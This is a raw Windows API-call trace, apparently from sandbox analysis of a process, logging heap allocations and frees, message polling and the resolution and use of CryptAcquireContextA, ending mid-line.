[0130.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0130.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0130.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0130.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0130.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0130.077] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0130.077] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0130.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0130.077] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0130.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0130.078] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0130.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0130.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0130.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0130.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0130.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0130.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0130.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0130.080] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0130.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0130.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0130.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0130.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0130.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0130.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0130.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69c08 [0130.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69c08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0130.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0130.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0130.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0130.081] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0130.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0130.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0130.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0130.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0130.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0130.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0130.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0130.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0130.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0130.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0130.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0130.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0130.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0130.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0130.082] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0130.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0130.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0130.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0130.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0130.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0130.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0130.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0130.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0130.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0130.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0130.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0130.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0130.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0130.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0130.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0130.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0130.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0130.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0130.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0130.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0130.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0130.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0130.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0130.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0130.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0130.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0130.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0130.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0130.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0130.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0130.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0130.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0130.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0130.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0130.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0130.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0130.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0130.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0130.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0130.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0130.086] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0130.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0130.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0130.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0130.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0130.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0130.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0130.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0130.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0130.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0130.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0130.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0130.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0130.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0130.087] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0130.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0130.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0130.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0130.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0130.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0130.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0130.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0130.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0130.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0130.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0130.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0130.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0130.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0130.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0130.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0130.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0130.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0130.088] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0130.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0130.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0130.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.088] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0130.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0130.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0130.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0130.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0130.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0130.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0130.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0130.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0130.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0130.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0130.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0130.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0130.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0130.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0130.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0130.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0130.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0130.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | 